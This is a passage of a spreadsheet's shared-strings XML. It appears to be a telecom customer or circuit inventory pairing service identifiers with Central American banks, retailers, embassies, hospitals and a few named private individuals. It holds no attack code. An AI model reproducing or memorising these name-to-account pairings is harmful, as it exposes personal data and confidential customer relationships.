    <t>IDG000230SV</t>
  </si>
  <si>
    <t>NOE ALBERTO GUILLEN</t>
  </si>
  <si>
    <t>5397825ON</t>
  </si>
  <si>
    <t>ID1064026SV</t>
  </si>
  <si>
    <t>F4538217</t>
  </si>
  <si>
    <t>349900178T</t>
  </si>
  <si>
    <t>F4529792</t>
  </si>
  <si>
    <t>615800004T</t>
  </si>
  <si>
    <t>90001909335T</t>
  </si>
  <si>
    <t>682300001T</t>
  </si>
  <si>
    <t>CREDOMATIC S.A.</t>
  </si>
  <si>
    <t>297401503T</t>
  </si>
  <si>
    <t>F4533317</t>
  </si>
  <si>
    <t>F4527581</t>
  </si>
  <si>
    <t>CC_CALLEJA_SV_T237</t>
  </si>
  <si>
    <t>F4527418</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_INTERNET_ZONA2_COBAN</t>
  </si>
  <si>
    <t>F4538305</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_INTERNET_AGENCIA_0202</t>
  </si>
  <si>
    <t>ID1124104SV</t>
  </si>
  <si>
    <t>F4530926</t>
  </si>
  <si>
    <t>CC_AZTECA_GT_SUC007807</t>
  </si>
  <si>
    <t>F4535248</t>
  </si>
  <si>
    <t>F4536003</t>
  </si>
  <si>
    <t>1614617OH</t>
  </si>
  <si>
    <t>F4538300</t>
  </si>
  <si>
    <t>F4538304</t>
  </si>
  <si>
    <t>F4538308</t>
  </si>
  <si>
    <t>F4533328</t>
  </si>
  <si>
    <t>F4529423</t>
  </si>
  <si>
    <t>F4530927</t>
  </si>
  <si>
    <t>939786OH</t>
  </si>
  <si>
    <t>F4535416</t>
  </si>
  <si>
    <t>F4538343</t>
  </si>
  <si>
    <t>F4538535</t>
  </si>
  <si>
    <t>F4538582</t>
  </si>
  <si>
    <t>F4534126</t>
  </si>
  <si>
    <t>47504312T</t>
  </si>
  <si>
    <t>F4538579</t>
  </si>
  <si>
    <t>F4538583</t>
  </si>
  <si>
    <t>ON0002264390/PROGRAMA AMPLIACION DE CONECTIVIDAD AL MINSA EN LAS UNIDA</t>
  </si>
  <si>
    <t>F4536426</t>
  </si>
  <si>
    <t>47502249T</t>
  </si>
  <si>
    <t>F4537349</t>
  </si>
  <si>
    <t>F4538580</t>
  </si>
  <si>
    <t>208200021T</t>
  </si>
  <si>
    <t>F4533327</t>
  </si>
  <si>
    <t>F4533331</t>
  </si>
  <si>
    <t>F4532531</t>
  </si>
  <si>
    <t>F4533768</t>
  </si>
  <si>
    <t>22592800SV</t>
  </si>
  <si>
    <t>SMARTSA S.A. DE C.V.</t>
  </si>
  <si>
    <t>F4527105</t>
  </si>
  <si>
    <t>99800049T</t>
  </si>
  <si>
    <t>RADIO TELEVISION GUATEMALA, S.A.</t>
  </si>
  <si>
    <t>F4526648</t>
  </si>
  <si>
    <t>F4528393</t>
  </si>
  <si>
    <t>770600148T</t>
  </si>
  <si>
    <t>F4527106</t>
  </si>
  <si>
    <t>ID1001171SV</t>
  </si>
  <si>
    <t>90001907963T</t>
  </si>
  <si>
    <t>F4528194</t>
  </si>
  <si>
    <t>894900031T</t>
  </si>
  <si>
    <t>MINISTERIO PUBLICO..</t>
  </si>
  <si>
    <t>F4532520</t>
  </si>
  <si>
    <t>878700001T</t>
  </si>
  <si>
    <t>FAREI SOCIEDAD ANONIMA</t>
  </si>
  <si>
    <t>CC_CALLEJA_SV_T57</t>
  </si>
  <si>
    <t>F4526468</t>
  </si>
  <si>
    <t>8900347T</t>
  </si>
  <si>
    <t>F4532061</t>
  </si>
  <si>
    <t>F4533201</t>
  </si>
  <si>
    <t>F4533979</t>
  </si>
  <si>
    <t>CC_IJSUD_GT_BARRIO_OLINTEPEQUE</t>
  </si>
  <si>
    <t>F4532521</t>
  </si>
  <si>
    <t>F4531199</t>
  </si>
  <si>
    <t>F4532214</t>
  </si>
  <si>
    <t>865000009T</t>
  </si>
  <si>
    <t>426100039T</t>
  </si>
  <si>
    <t>F4529457</t>
  </si>
  <si>
    <t>F4526668</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_AGENCIA_0294</t>
  </si>
  <si>
    <t>F4533369</t>
  </si>
  <si>
    <t>459900006T</t>
  </si>
  <si>
    <t>EUROTIENDAS DE GUATEMALA S.A.</t>
  </si>
  <si>
    <t>F4528052</t>
  </si>
  <si>
    <t>F4530657</t>
  </si>
  <si>
    <t>F4536439</t>
  </si>
  <si>
    <t>F4537902</t>
  </si>
  <si>
    <t>CC_WALMART_CR_TIENDA_3128</t>
  </si>
  <si>
    <t>FG9264G</t>
  </si>
  <si>
    <t>F4528188</t>
  </si>
  <si>
    <t>F4530187</t>
  </si>
  <si>
    <t>F4531382</t>
  </si>
  <si>
    <t>727100016T</t>
  </si>
  <si>
    <t>38300458T</t>
  </si>
  <si>
    <t>F4538269</t>
  </si>
  <si>
    <t>ID1029359SV</t>
  </si>
  <si>
    <t>EMBAJADA DE LA REPUBLICA DE CUBA</t>
  </si>
  <si>
    <t>F4528801</t>
  </si>
  <si>
    <t>48600018T</t>
  </si>
  <si>
    <t>F4535394</t>
  </si>
  <si>
    <t>F4536679</t>
  </si>
  <si>
    <t>F4538218</t>
  </si>
  <si>
    <t>F4538022</t>
  </si>
  <si>
    <t>F4530018</t>
  </si>
  <si>
    <t>F4529316</t>
  </si>
  <si>
    <t>F4533721</t>
  </si>
  <si>
    <t>F4537851</t>
  </si>
  <si>
    <t>F4538804</t>
  </si>
  <si>
    <t>47503494T</t>
  </si>
  <si>
    <t>F4538803</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_AGENCIA_0204</t>
  </si>
  <si>
    <t>F4539279</t>
  </si>
  <si>
    <t>F4533315</t>
  </si>
  <si>
    <t>CC_WALMART_CR_TIENDA_4417</t>
  </si>
  <si>
    <t>F4533316</t>
  </si>
  <si>
    <t>F4533313</t>
  </si>
  <si>
    <t>F4527712</t>
  </si>
  <si>
    <t>F4533310</t>
  </si>
  <si>
    <t>F4533311</t>
  </si>
  <si>
    <t>F4535568</t>
  </si>
  <si>
    <t>F4528884</t>
  </si>
  <si>
    <t>F4531528</t>
  </si>
  <si>
    <t>F4531529</t>
  </si>
  <si>
    <t>24500012T</t>
  </si>
  <si>
    <t>FPK ELECTRONICOS, S.A.</t>
  </si>
  <si>
    <t>F4537239</t>
  </si>
  <si>
    <t>F4538268</t>
  </si>
  <si>
    <t>286500001T</t>
  </si>
  <si>
    <t>INDUSTRIA DE CONSERVAS S.A.</t>
  </si>
  <si>
    <t>286500002T</t>
  </si>
  <si>
    <t>F4532484</t>
  </si>
  <si>
    <t>CC_IJSUD_GT_GUALAN</t>
  </si>
  <si>
    <t>F4538349</t>
  </si>
  <si>
    <t>F4528717</t>
  </si>
  <si>
    <t>F4532425</t>
  </si>
  <si>
    <t>8901254T</t>
  </si>
  <si>
    <t>F4537291</t>
  </si>
  <si>
    <t>F4528894</t>
  </si>
  <si>
    <t>CC_FUNDGENESIS_GT_ZONA4_003</t>
  </si>
  <si>
    <t>CC_AZTECA_GT_SUC003579</t>
  </si>
  <si>
    <t>F4532486</t>
  </si>
  <si>
    <t>F4532831</t>
  </si>
  <si>
    <t>F4532832</t>
  </si>
  <si>
    <t>F4533204</t>
  </si>
  <si>
    <t>F4532726</t>
  </si>
  <si>
    <t>F4533367</t>
  </si>
  <si>
    <t>CC_FUNDGENESIS_GT_LA_LIBERTAD_034</t>
  </si>
  <si>
    <t>4441180ON</t>
  </si>
  <si>
    <t>MP230427040SSV</t>
  </si>
  <si>
    <t>PAGADURIA AUXILIAR SEDE MAG</t>
  </si>
  <si>
    <t>829800057T</t>
  </si>
  <si>
    <t>F4531309</t>
  </si>
  <si>
    <t>ID1371003SV</t>
  </si>
  <si>
    <t>LAGEO S.A. DE C.V.</t>
  </si>
  <si>
    <t>539600022T</t>
  </si>
  <si>
    <t>DISTRIBUIDORA DEL CARIBE DE GUATEMALA, S.A.</t>
  </si>
  <si>
    <t>607842ON</t>
  </si>
  <si>
    <t>F4533200</t>
  </si>
  <si>
    <t>F4533365</t>
  </si>
  <si>
    <t>48600020T</t>
  </si>
  <si>
    <t>48600012T</t>
  </si>
  <si>
    <t>F4527262</t>
  </si>
  <si>
    <t>5422864ON</t>
  </si>
  <si>
    <t>F4529018</t>
  </si>
  <si>
    <t>F4529020</t>
  </si>
  <si>
    <t>F4531522</t>
  </si>
  <si>
    <t>F4532517</t>
  </si>
  <si>
    <t>F4530150</t>
  </si>
  <si>
    <t>F4530151</t>
  </si>
  <si>
    <t>F4528408</t>
  </si>
  <si>
    <t>CC_PRONE_GT_SUPER_24_SAN_MIGUEL_PETAPA_1</t>
  </si>
  <si>
    <t>F4531322</t>
  </si>
  <si>
    <t>F4531326</t>
  </si>
  <si>
    <t>F4531324</t>
  </si>
  <si>
    <t>F4531357</t>
  </si>
  <si>
    <t>F4531358</t>
  </si>
  <si>
    <t>90001903643T</t>
  </si>
  <si>
    <t>F4533951</t>
  </si>
  <si>
    <t>F4527336</t>
  </si>
  <si>
    <t>90001904774T</t>
  </si>
  <si>
    <t>F4531023</t>
  </si>
  <si>
    <t>758500176T</t>
  </si>
  <si>
    <t>F4533749</t>
  </si>
  <si>
    <t>F4534174</t>
  </si>
  <si>
    <t>ID1124077SV</t>
  </si>
  <si>
    <t>F4535348</t>
  </si>
  <si>
    <t>1664258OH</t>
  </si>
  <si>
    <t>OH1001058856</t>
  </si>
  <si>
    <t>1451446OH</t>
  </si>
  <si>
    <t>F4529513</t>
  </si>
  <si>
    <t>F4530779</t>
  </si>
  <si>
    <t>90001905913T</t>
  </si>
  <si>
    <t>F4531024</t>
  </si>
  <si>
    <t>F4531204</t>
  </si>
  <si>
    <t>F4531207</t>
  </si>
  <si>
    <t>F4531325</t>
  </si>
  <si>
    <t>47502017T</t>
  </si>
  <si>
    <t>F4532066</t>
  </si>
  <si>
    <t>F4532625</t>
  </si>
  <si>
    <t>863400305T</t>
  </si>
  <si>
    <t>3413397ON</t>
  </si>
  <si>
    <t>F4533750</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_AGENCIA_2090</t>
  </si>
  <si>
    <t>F4527604</t>
  </si>
  <si>
    <t>F4528893</t>
  </si>
  <si>
    <t>F4532067</t>
  </si>
  <si>
    <t>F4533351</t>
  </si>
  <si>
    <t>F4533371</t>
  </si>
  <si>
    <t>F4533751</t>
  </si>
  <si>
    <t>5209250ON</t>
  </si>
  <si>
    <t>F4531523</t>
  </si>
  <si>
    <t>F4531334</t>
  </si>
  <si>
    <t>47502033T</t>
  </si>
  <si>
    <t>3575474ON</t>
  </si>
  <si>
    <t>F4533752</t>
  </si>
  <si>
    <t>F4527635</t>
  </si>
  <si>
    <t>F4530611</t>
  </si>
  <si>
    <t>F4531208</t>
  </si>
  <si>
    <t>F4532077</t>
  </si>
  <si>
    <t>CC_CAMPERO_GT_INTERNET_C123</t>
  </si>
  <si>
    <t>F4533539</t>
  </si>
  <si>
    <t>F4533753</t>
  </si>
  <si>
    <t>F4534563</t>
  </si>
  <si>
    <t>F4528759</t>
  </si>
  <si>
    <t>F4530841</t>
  </si>
  <si>
    <t>894900004T</t>
  </si>
  <si>
    <t>1525974OH</t>
  </si>
  <si>
    <t>877000011T</t>
  </si>
  <si>
    <t>90001902829T</t>
  </si>
  <si>
    <t>F4527317</t>
  </si>
  <si>
    <t>758500077T</t>
  </si>
  <si>
    <t>90001904282T</t>
  </si>
  <si>
    <t>F4533536</t>
  </si>
  <si>
    <t>245700152T</t>
  </si>
  <si>
    <t>23994900SV</t>
  </si>
  <si>
    <t>F4529701</t>
  </si>
  <si>
    <t>5618106ON</t>
  </si>
  <si>
    <t>IBEX GLOBAL DE NICARAGUA</t>
  </si>
  <si>
    <t>F4528733</t>
  </si>
  <si>
    <t>F4531349</t>
  </si>
  <si>
    <t>F4532724</t>
  </si>
  <si>
    <t>ID1024298SV</t>
  </si>
  <si>
    <t>KAROL JASMIN MARROQUIN MARROQUIN</t>
  </si>
  <si>
    <t>90001801100T</t>
  </si>
  <si>
    <t>470200003T</t>
  </si>
  <si>
    <t>F4534530</t>
  </si>
  <si>
    <t>349900269T</t>
  </si>
  <si>
    <t>F4534531</t>
  </si>
  <si>
    <t>F4529391</t>
  </si>
  <si>
    <t>F4530966</t>
  </si>
  <si>
    <t>F4532445</t>
  </si>
  <si>
    <t>F4532694</t>
  </si>
  <si>
    <t>832000041T</t>
  </si>
  <si>
    <t>F4530608</t>
  </si>
  <si>
    <t>639800001T</t>
  </si>
  <si>
    <t>AGRICOLA EL APIPAL, S.A.</t>
  </si>
  <si>
    <t>745754OH</t>
  </si>
  <si>
    <t>OH1000654610/FINCA TROPICAL -</t>
  </si>
  <si>
    <t>F4530609</t>
  </si>
  <si>
    <t>F4530784</t>
  </si>
  <si>
    <t>F4530818</t>
  </si>
  <si>
    <t>F4528938</t>
  </si>
  <si>
    <t>F4531288</t>
  </si>
  <si>
    <t>427100034T</t>
  </si>
  <si>
    <t>349400064T</t>
  </si>
  <si>
    <t>927700009T</t>
  </si>
  <si>
    <t>23276300SV</t>
  </si>
  <si>
    <t>F4530610</t>
  </si>
  <si>
    <t>8901196T</t>
  </si>
  <si>
    <t>F4535116</t>
  </si>
  <si>
    <t>632600001T</t>
  </si>
  <si>
    <t>AL CUBO, S.A.</t>
  </si>
  <si>
    <t>F4535926</t>
  </si>
  <si>
    <t>F4532495</t>
  </si>
  <si>
    <t>MP120843023SSV</t>
  </si>
  <si>
    <t>MP121153010SSV</t>
  </si>
  <si>
    <t>454283ON</t>
  </si>
  <si>
    <t>22598099SV</t>
  </si>
  <si>
    <t>MOTO PARTES S.A. DE C.V.</t>
  </si>
  <si>
    <t>F4533942</t>
  </si>
  <si>
    <t>878865OH</t>
  </si>
  <si>
    <t>OH1000739550/FUNDACION FREE THE OPPRESSED -</t>
  </si>
  <si>
    <t>469800011T</t>
  </si>
  <si>
    <t>IP2371001SV</t>
  </si>
  <si>
    <t>F4535137</t>
  </si>
  <si>
    <t>F4535328</t>
  </si>
  <si>
    <t>F4535404</t>
  </si>
  <si>
    <t>450611ON</t>
  </si>
  <si>
    <t>863400165T</t>
  </si>
  <si>
    <t>MP120837002SSV</t>
  </si>
  <si>
    <t>F4530089</t>
  </si>
  <si>
    <t>527100010T</t>
  </si>
  <si>
    <t>F4535329</t>
  </si>
  <si>
    <t>F4534223</t>
  </si>
  <si>
    <t>523660OH</t>
  </si>
  <si>
    <t>MP121154009SSV</t>
  </si>
  <si>
    <t>90001801099T</t>
  </si>
  <si>
    <t>F4534010</t>
  </si>
  <si>
    <t>334900002T</t>
  </si>
  <si>
    <t>MP121255003SSV</t>
  </si>
  <si>
    <t>566600001T</t>
  </si>
  <si>
    <t>F4526542</t>
  </si>
  <si>
    <t>F4529232</t>
  </si>
  <si>
    <t>F4529692</t>
  </si>
  <si>
    <t>CC_WALMART_CR_TIENDA_4339</t>
  </si>
  <si>
    <t>1038494OH</t>
  </si>
  <si>
    <t>IDG002397SV</t>
  </si>
  <si>
    <t>F4534092</t>
  </si>
  <si>
    <t>F4534168</t>
  </si>
  <si>
    <t>F4526910</t>
  </si>
  <si>
    <t>F4530821</t>
  </si>
  <si>
    <t>886400001T</t>
  </si>
  <si>
    <t>SOCIEDAD PRODUCTIVA, S.A.</t>
  </si>
  <si>
    <t>858800005T</t>
  </si>
  <si>
    <t>F4534175</t>
  </si>
  <si>
    <t>F4527814</t>
  </si>
  <si>
    <t>F4528502</t>
  </si>
  <si>
    <t>90001901048T</t>
  </si>
  <si>
    <t>F4534541</t>
  </si>
  <si>
    <t>1643536OH</t>
  </si>
  <si>
    <t>IP2135022SV</t>
  </si>
  <si>
    <t>F4529058</t>
  </si>
  <si>
    <t>312000001T</t>
  </si>
  <si>
    <t>CENTRO EDUCATIVO JUVENIL BAUTISTA SHALOM</t>
  </si>
  <si>
    <t>F4531980</t>
  </si>
  <si>
    <t>F4529745</t>
  </si>
  <si>
    <t>CC_CREDOMATIC_GT_INTERNET_AGENCIA_0131</t>
  </si>
  <si>
    <t>F4527564</t>
  </si>
  <si>
    <t>90001909724T</t>
  </si>
  <si>
    <t>47500883T</t>
  </si>
  <si>
    <t>F4530641</t>
  </si>
  <si>
    <t>IP2187089SV</t>
  </si>
  <si>
    <t>F4528439</t>
  </si>
  <si>
    <t>770600212T</t>
  </si>
  <si>
    <t>F4533183</t>
  </si>
  <si>
    <t>CC_IJSUD_GT_ESTANZUELA</t>
  </si>
  <si>
    <t>CC_IJSUD_GT_CUYOTENANGO</t>
  </si>
  <si>
    <t>F4531259</t>
  </si>
  <si>
    <t>F4534730</t>
  </si>
  <si>
    <t>F4534733</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_AGENCIA_0448</t>
  </si>
  <si>
    <t>F4535197</t>
  </si>
  <si>
    <t>F4534714</t>
  </si>
  <si>
    <t>F4532905</t>
  </si>
  <si>
    <t>F4534719</t>
  </si>
  <si>
    <t>F4530496</t>
  </si>
  <si>
    <t>ID1045077SV</t>
  </si>
  <si>
    <t>LANCO EL SALVADOR SA DE CV</t>
  </si>
  <si>
    <t>F4530648</t>
  </si>
  <si>
    <t>F4528970</t>
  </si>
  <si>
    <t>F4533401</t>
  </si>
  <si>
    <t>1641389OH</t>
  </si>
  <si>
    <t>F4528735</t>
  </si>
  <si>
    <t>23939500SV</t>
  </si>
  <si>
    <t>HOSPITAL NACIONAL GENERAL SANTA GERTRUDIS</t>
  </si>
  <si>
    <t>F4528742</t>
  </si>
  <si>
    <t>F4529308</t>
  </si>
  <si>
    <t>F4530166</t>
  </si>
  <si>
    <t>F4532328</t>
  </si>
  <si>
    <t>F4533293</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM0232</t>
  </si>
  <si>
    <t>F4533294</t>
  </si>
  <si>
    <t>847600001T</t>
  </si>
  <si>
    <t>SOLUCIONES DE COLOCACION Y TRANSPORTE SOCIEDAD ANONIMA</t>
  </si>
  <si>
    <t>CONTR0001372458OC</t>
  </si>
  <si>
    <t>COCA COLA FEMSA DE COSTA RICA S.A.</t>
  </si>
  <si>
    <t>F4535089</t>
  </si>
  <si>
    <t>F4528806</t>
  </si>
  <si>
    <t>361700053T</t>
  </si>
  <si>
    <t>4589569ON</t>
  </si>
  <si>
    <t>F4529031</t>
  </si>
  <si>
    <t>F4534916</t>
  </si>
  <si>
    <t>22414700SV</t>
  </si>
  <si>
    <t>910400046T</t>
  </si>
  <si>
    <t>F4531306</t>
  </si>
  <si>
    <t>297401505T</t>
  </si>
  <si>
    <t>F4528172</t>
  </si>
  <si>
    <t>MP121154008SSV</t>
  </si>
  <si>
    <t>90001909299T</t>
  </si>
  <si>
    <t>F4526632</t>
  </si>
  <si>
    <t>8200082T</t>
  </si>
  <si>
    <t>F4532638</t>
  </si>
  <si>
    <t>F4533608</t>
  </si>
  <si>
    <t>697400002T</t>
  </si>
  <si>
    <t>IP2045263SV</t>
  </si>
  <si>
    <t>F4534769</t>
  </si>
  <si>
    <t>F4534772</t>
  </si>
  <si>
    <t>90001910952T</t>
  </si>
  <si>
    <t>F4536347</t>
  </si>
  <si>
    <t>F4527987</t>
  </si>
  <si>
    <t>873500001T</t>
  </si>
  <si>
    <t>TU &amp; YO 4 EVER, S.A</t>
  </si>
  <si>
    <t>25252400SV</t>
  </si>
  <si>
    <t>FARMACEUTICA RODIM S.A. DE C.V.</t>
  </si>
  <si>
    <t>F4532273</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM0779</t>
  </si>
  <si>
    <t>1596375OH</t>
  </si>
  <si>
    <t>F4536182</t>
  </si>
  <si>
    <t>F4536102</t>
  </si>
  <si>
    <t>F4529197</t>
  </si>
  <si>
    <t>F4528799</t>
  </si>
  <si>
    <t>F4528695</t>
  </si>
  <si>
    <t>F4526898</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_MERCADO_STA_CATARINA_PINULA</t>
  </si>
  <si>
    <t>450666ON</t>
  </si>
  <si>
    <t>806300455T</t>
  </si>
  <si>
    <t>MP120843026SSV</t>
  </si>
  <si>
    <t>1041839OH</t>
  </si>
  <si>
    <t>F4533625</t>
  </si>
  <si>
    <t>F4533872</t>
  </si>
  <si>
    <t>47503006T</t>
  </si>
  <si>
    <t>F4529329</t>
  </si>
  <si>
    <t>86100067T</t>
  </si>
  <si>
    <t>F4533626</t>
  </si>
  <si>
    <t>732871OH</t>
  </si>
  <si>
    <t>340500099T</t>
  </si>
  <si>
    <t>F4533993</t>
  </si>
  <si>
    <t>F4528744</t>
  </si>
  <si>
    <t>F4530121</t>
  </si>
  <si>
    <t>F4530156</t>
  </si>
  <si>
    <t>426100046T</t>
  </si>
  <si>
    <t>F4533098</t>
  </si>
  <si>
    <t>770600162T</t>
  </si>
  <si>
    <t>F4535338</t>
  </si>
  <si>
    <t>IP2167044SV</t>
  </si>
  <si>
    <t>937861OH</t>
  </si>
  <si>
    <t>F4536353</t>
  </si>
  <si>
    <t>451365ON</t>
  </si>
  <si>
    <t>F4529434</t>
  </si>
  <si>
    <t>F4532434</t>
  </si>
  <si>
    <t>F4532188</t>
  </si>
  <si>
    <t>ID1033085SV</t>
  </si>
  <si>
    <t>F4536343</t>
  </si>
  <si>
    <t>452854ON</t>
  </si>
  <si>
    <t>499130ON</t>
  </si>
  <si>
    <t>271200010T</t>
  </si>
  <si>
    <t>F4531977</t>
  </si>
  <si>
    <t>1555274OH</t>
  </si>
  <si>
    <t>F4533629</t>
  </si>
  <si>
    <t>90001910060T</t>
  </si>
  <si>
    <t>F4534100</t>
  </si>
  <si>
    <t>90001910844T</t>
  </si>
  <si>
    <t>F4533870</t>
  </si>
  <si>
    <t>F4534611</t>
  </si>
  <si>
    <t>7800428T</t>
  </si>
  <si>
    <t>F4530068</t>
  </si>
  <si>
    <t>F4531459</t>
  </si>
  <si>
    <t>PA-MNCSCT0001IN-IDC-PA</t>
  </si>
  <si>
    <t>SCOTIABANK</t>
  </si>
  <si>
    <t>F4535378</t>
  </si>
  <si>
    <t>838362OH</t>
  </si>
  <si>
    <t>OH1000712620/OFICINA ADMINISTRATIVA DE BIENES INCAUTADOS -</t>
  </si>
  <si>
    <t>F4535412</t>
  </si>
  <si>
    <t>22638080SV</t>
  </si>
  <si>
    <t>JORLISAL SA DE CV</t>
  </si>
  <si>
    <t>F4535996</t>
  </si>
  <si>
    <t>F4534612</t>
  </si>
  <si>
    <t>ID1001215SV</t>
  </si>
  <si>
    <t>LEMUSIMUN PUBLICIDAD S.A. DE C.V.</t>
  </si>
  <si>
    <t>F4529437</t>
  </si>
  <si>
    <t>F4532239</t>
  </si>
  <si>
    <t>F4532132</t>
  </si>
  <si>
    <t>F4532463</t>
  </si>
  <si>
    <t>F4532932</t>
  </si>
  <si>
    <t>1646931OH</t>
  </si>
  <si>
    <t>OH1000180672/EMBAJADA DE ALEMANIA -</t>
  </si>
  <si>
    <t>8901398T</t>
  </si>
  <si>
    <t>F4536380</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_AGENCIA_1360002</t>
  </si>
  <si>
    <t>F4536382</t>
  </si>
  <si>
    <t>97100285T</t>
  </si>
  <si>
    <t>F4528396</t>
  </si>
  <si>
    <t>F4532489</t>
  </si>
  <si>
    <t>F4534196</t>
  </si>
  <si>
    <t>F4527660</t>
  </si>
  <si>
    <t>F4531294</t>
  </si>
  <si>
    <t>F4539231</t>
  </si>
  <si>
    <t>90001911335T</t>
  </si>
  <si>
    <t xml:space="preserve"> FABRICA DE ENVASES DE HOJALATA</t>
  </si>
  <si>
    <t>F4530238</t>
  </si>
  <si>
    <t>F4528053</t>
  </si>
  <si>
    <t>IP2225010SV</t>
  </si>
  <si>
    <t>F4532464</t>
  </si>
  <si>
    <t>F4533191</t>
  </si>
  <si>
    <t>F4528399</t>
  </si>
  <si>
    <t>F4529161</t>
  </si>
  <si>
    <t>348400002T</t>
  </si>
  <si>
    <t>F4532862</t>
  </si>
  <si>
    <t>8902677T</t>
  </si>
  <si>
    <t>331000087T</t>
  </si>
  <si>
    <t>F4535189</t>
  </si>
  <si>
    <t>588100001T</t>
  </si>
  <si>
    <t>F4535484</t>
  </si>
  <si>
    <t>291700007T</t>
  </si>
  <si>
    <t>763469OH</t>
  </si>
  <si>
    <t>F4529287</t>
  </si>
  <si>
    <t>457514ON</t>
  </si>
  <si>
    <t>F4529476</t>
  </si>
  <si>
    <t>F4527964</t>
  </si>
  <si>
    <t>F4532863</t>
  </si>
  <si>
    <t>F4533598</t>
  </si>
  <si>
    <t>F4534102</t>
  </si>
  <si>
    <t>F4534633</t>
  </si>
  <si>
    <t>F4535473</t>
  </si>
  <si>
    <t>ID1071031SV</t>
  </si>
  <si>
    <t>GESTION INTEGRAL DE DESECHOS S.A. DE C.V.</t>
  </si>
  <si>
    <t>F4527580</t>
  </si>
  <si>
    <t>F4529404</t>
  </si>
  <si>
    <t>F4528743</t>
  </si>
  <si>
    <t>F4533604</t>
  </si>
  <si>
    <t>F4534103</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_INTERNET_AGENCIA_832</t>
  </si>
  <si>
    <t>5557988ON</t>
  </si>
  <si>
    <t>OIRSA LAS MANOS</t>
  </si>
  <si>
    <t>F4535191</t>
  </si>
  <si>
    <t>F4536027</t>
  </si>
  <si>
    <t>F4536470</t>
  </si>
  <si>
    <t>F4529289</t>
  </si>
  <si>
    <t>47503668T</t>
  </si>
  <si>
    <t>F4528745</t>
  </si>
  <si>
    <t>F4532089</t>
  </si>
  <si>
    <t>F4532719</t>
  </si>
  <si>
    <t>71500007T</t>
  </si>
  <si>
    <t>925687OH</t>
  </si>
  <si>
    <t>F4532494</t>
  </si>
  <si>
    <t>F4527984</t>
  </si>
  <si>
    <t>1296443OH</t>
  </si>
  <si>
    <t>CC_AZTECA_GT_SUC005995</t>
  </si>
  <si>
    <t>F4528085</t>
  </si>
  <si>
    <t>IP2145269SV</t>
  </si>
  <si>
    <t>1720120OH</t>
  </si>
  <si>
    <t>OH1000781271</t>
  </si>
  <si>
    <t>CC_INVERSIONES_CENTROAMERICANAS_GT_INTERNET_ATANATSIO</t>
  </si>
  <si>
    <t>F4531238</t>
  </si>
  <si>
    <t>F4531274</t>
  </si>
  <si>
    <t>F4535066</t>
  </si>
  <si>
    <t>F4536321</t>
  </si>
  <si>
    <t>F4537372</t>
  </si>
  <si>
    <t>86100069T</t>
  </si>
  <si>
    <t>F4538177</t>
  </si>
  <si>
    <t>IP2417002SV</t>
  </si>
  <si>
    <t>F4526624</t>
  </si>
  <si>
    <t>F4526566</t>
  </si>
  <si>
    <t>F4531239</t>
  </si>
  <si>
    <t>8902036T</t>
  </si>
  <si>
    <t>F4535332</t>
  </si>
  <si>
    <t>F4536559</t>
  </si>
  <si>
    <t>F4537564</t>
  </si>
  <si>
    <t>CC_WALMART_CR_TIENDA_0852</t>
  </si>
  <si>
    <t>F4538110</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_AGENCIA_0441</t>
  </si>
  <si>
    <t>770600057T</t>
  </si>
  <si>
    <t>1709141OH</t>
  </si>
  <si>
    <t>OH1001072544</t>
  </si>
  <si>
    <t>F4536363</t>
  </si>
  <si>
    <t>F4538387</t>
  </si>
  <si>
    <t>CC_CREDOMATIC_GT_MUNICIPALIDAD_SOTANO</t>
  </si>
  <si>
    <t>321000004T</t>
  </si>
  <si>
    <t>CVG ITSA S.A.</t>
  </si>
  <si>
    <t>F4534913</t>
  </si>
  <si>
    <t>F4538271</t>
  </si>
  <si>
    <t>F4538361</t>
  </si>
  <si>
    <t>F4538396</t>
  </si>
  <si>
    <t>F4531124</t>
  </si>
  <si>
    <t>F4527351</t>
  </si>
  <si>
    <t>F4528611</t>
  </si>
  <si>
    <t>5344593ON</t>
  </si>
  <si>
    <t>90001902610T</t>
  </si>
  <si>
    <t>F4526792</t>
  </si>
  <si>
    <t>F4528001</t>
  </si>
  <si>
    <t>F4538328</t>
  </si>
  <si>
    <t>F4538696</t>
  </si>
  <si>
    <t>929700001T</t>
  </si>
  <si>
    <t>HAPAG LLOYD GUATEMALA, S.A.</t>
  </si>
  <si>
    <t>F4528831</t>
  </si>
  <si>
    <t>F4532024</t>
  </si>
  <si>
    <t>F4535815</t>
  </si>
  <si>
    <t>5449673ON</t>
  </si>
  <si>
    <t>F4538399</t>
  </si>
  <si>
    <t>F4531498</t>
  </si>
  <si>
    <t>F4532816</t>
  </si>
  <si>
    <t>F4531190</t>
  </si>
  <si>
    <t>F4537588</t>
  </si>
  <si>
    <t>F4531550</t>
  </si>
  <si>
    <t>CC_AZTECA_GT_SUC000894</t>
  </si>
  <si>
    <t>452565ON</t>
  </si>
  <si>
    <t>F4530756</t>
  </si>
  <si>
    <t>90001909564T</t>
  </si>
  <si>
    <t>F4536200</t>
  </si>
  <si>
    <t>F4536367</t>
  </si>
  <si>
    <t>8902075T</t>
  </si>
  <si>
    <t>F4537617</t>
  </si>
  <si>
    <t>F4538551</t>
  </si>
  <si>
    <t>CC_WALMART_CR_TIENDA_4020</t>
  </si>
  <si>
    <t>F4538568</t>
  </si>
  <si>
    <t>F4533632</t>
  </si>
  <si>
    <t>F4534696</t>
  </si>
  <si>
    <t>F4537618</t>
  </si>
  <si>
    <t>F4527728</t>
  </si>
  <si>
    <t>F4531127</t>
  </si>
  <si>
    <t>548500001T</t>
  </si>
  <si>
    <t>F4538404</t>
  </si>
  <si>
    <t>F4538595</t>
  </si>
  <si>
    <t>F4538471</t>
  </si>
  <si>
    <t>F4538472</t>
  </si>
  <si>
    <t>F4538475</t>
  </si>
  <si>
    <t>CC_BANCO_AGRICOLA_SV_CHALCHUAPA_TIENDA_KELVIN</t>
  </si>
  <si>
    <t>90001907989T</t>
  </si>
  <si>
    <t>CC_WALMART_CR_TIENDA_3104</t>
  </si>
  <si>
